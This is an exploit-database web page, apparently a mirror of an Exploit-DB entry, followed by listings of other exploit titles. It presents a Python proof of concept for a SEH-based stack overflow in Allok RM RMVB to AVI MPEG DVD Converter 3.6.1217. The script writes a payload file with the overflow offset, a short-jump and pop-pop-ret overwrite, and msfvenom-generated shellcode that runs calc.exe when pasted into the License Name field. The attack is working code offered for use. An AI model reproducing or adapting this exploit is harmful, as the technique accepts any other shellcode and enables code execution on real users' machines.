Menu

Search for hundreds of thousands of exploits

"Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)"

Author

Exploit author

antonio

Platform

Exploit platform

windows

Release date

Exploit published date

2020-01-13

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# Exploit Title: Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)
# Date: 2020-01-12
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.alloksoft.com
# Software Link: https://www.alloksoft.com/allok_rmconverter.exe
# Version: 3.6.1217
# Tested on: Windows 7 SP1 32-bit

# Copy paste the contents of poc_seh.txt into the License Name input field
# of  Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 to execute calc.exe.

#!/usr/bin/python

nseh_offset = 780
total = 1000

#  msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode_calc CMD=calc.exe EXITFUNC=thread
shellcode_calc =  b""
shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24"
shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31"
shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97"
shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d"
shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01"
shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58"
shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52"
shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95"
shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22"
shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73"
shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b"
shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2"
shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92"
shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a"
shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74"
shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37"
shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28"
shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60"
shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc"
shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59"
shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4"
shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47"

poc = ""
poc += "A"*nseh_offset
poc += "\xEB\x0b\x90\x90"   # jmp forward (nseh)
poc +=  "\x11\x7b\x03\x10"  # pop pop ret (seh)
poc += "\x90"*20
poc += shellcode_calc
poc += "D"*(total - len(poc))

file = open("poc_seh.txt","w")
file.write(poc)
file.close()
Release DateTitleTypePlatformAuthor
2020-03-30"Zen Load Balancer 3.10.1 - Remote Code Execution"webappscgi"Cody Sixteen"
2020-03-30"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)"localwindowsHodorsec
2020-03-30"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution"remotelinux0xsha
2020-03-30"Joomla! com_fabrik 3.9.11 - Directory Traversal"webappsphpqw3rTyTy
2020-03-30"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation"localwindows"Daniel García Gutiérrez"
2020-03-30"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Mustafa Emre Gül"
2020-03-27"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal"webappsjavahongphukt
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution"webappsphpvikingfr
2020-03-27"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-26"TP-Link Archer C50 3 - Denial of Service (PoC)"webappshardwarethewhiteh4t
2020-03-26"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-25"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-25"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path"localwindows"Felipe Winsnes"
2020-03-25"Joomla! Component GMapFP 3.30 - Arbitrary File Upload"webappsphpThelastVvV
2020-03-25"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-25"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-24"UliCMS 2020.1 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-24"Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-03-24"Veyon 4.3.4 - 'VeyonService' Unquoted Service Path"localwindows"Víctor García"
2020-03-24"UCM6202 1.0.18.13 - Remote Command Injection"webappshardware"Jacob Baines"
2020-03-23"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)"dosios"Ivan Marmolejo"
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-03-23"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection"webappsphpqw3rTyTy
2020-03-23"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection"webappsphp"Matthew Aberegg"
2020-03-23"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)"doswindows"Cem Onat Karagun"
2020-03-23"CyberArk PSMP 10.9.1 - Policy Restriction Bypass"remotemultiple"LAHBAL Said"
2020-03-20"VMware Fusion 11.5.2 - Privilege Escalation"localmacos"Rich Mirch"
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
Release DateTitleTypePlatformAuthor
2020-03-30"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)"localwindowsHodorsec
2020-03-30"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation"localwindows"Daniel García Gutiérrez"
2020-03-30"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-25"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-25"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path"localwindows"Felipe Winsnes"
2020-03-25"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-24"Veyon 4.3.4 - 'VeyonService' Unquoted Service Path"localwindows"Víctor García"
2020-03-23"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)"doswindows"Cem Onat Karagun"
2020-03-18"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path"localwindows"El Masas"
2020-03-14"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)"doswindowseerykitty
2020-03-13"AnyBurn 4.8 - Buffer Overflow (SEH)"localwindows"Richard Davy"
2020-03-12"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-11"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-09"Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)"remotewindowsMetasploit
2020-03-06"Deep Instinct Windows Agent 1.2.29.0 - 'DeepMgmtService' Unquoted Service Path"localwindows"Oscar Flores"
2020-03-06"ASUS GiftBox Desktop 1.1.1.127 - 'ASUSGiftBoxDesktop' Unquoted Service Path"localwindows"Oscar Flores"
2020-03-06"SpyHunter 4 - 'SpyHunter 4 Service' Unquoted Service Path"localwindows"Alejandro Reyes"
2020-03-06"Iskysoft Application Framework Service 2.4.3.241 - 'IsAppService' Unquoted Service Path"localwindows"Alejandro Reyes"
2020-03-05"Exchange Control Panel - Viewstate Deserialization (Metasploit)"remotewindowsMetasploit
2020-03-03"Microsoft Windows - 'WizardOpium' Local Privilege Escalation"localwindowspiotrflorczyk
2020-03-02"CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow"remotewindowswetw0rk
2020-03-02"Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution"remotewindowsPhotubias
2020-03-02"Cyberoam Authentication Client 2.1.2.7 - Buffer Overflow (SEH)"localwindows"Andrey Stoykov"
2020-03-02"Wing FTP Server 6.2.3 - Privilege Escalation"localwindows"Cary Hooper"
2020-02-26"Core FTP LE 2.2 - Denial of Service (PoC)"doswindows"Ismael Nava"
2020-02-25"aSc TimeTables 2020.11.4 - Denial of Service (PoC)"doswindows"Ismael Nava"
2020-02-25"Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)"doswindows"berat isler"
2020-02-25"SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)"doswindows"Ismael Nava"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47910/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse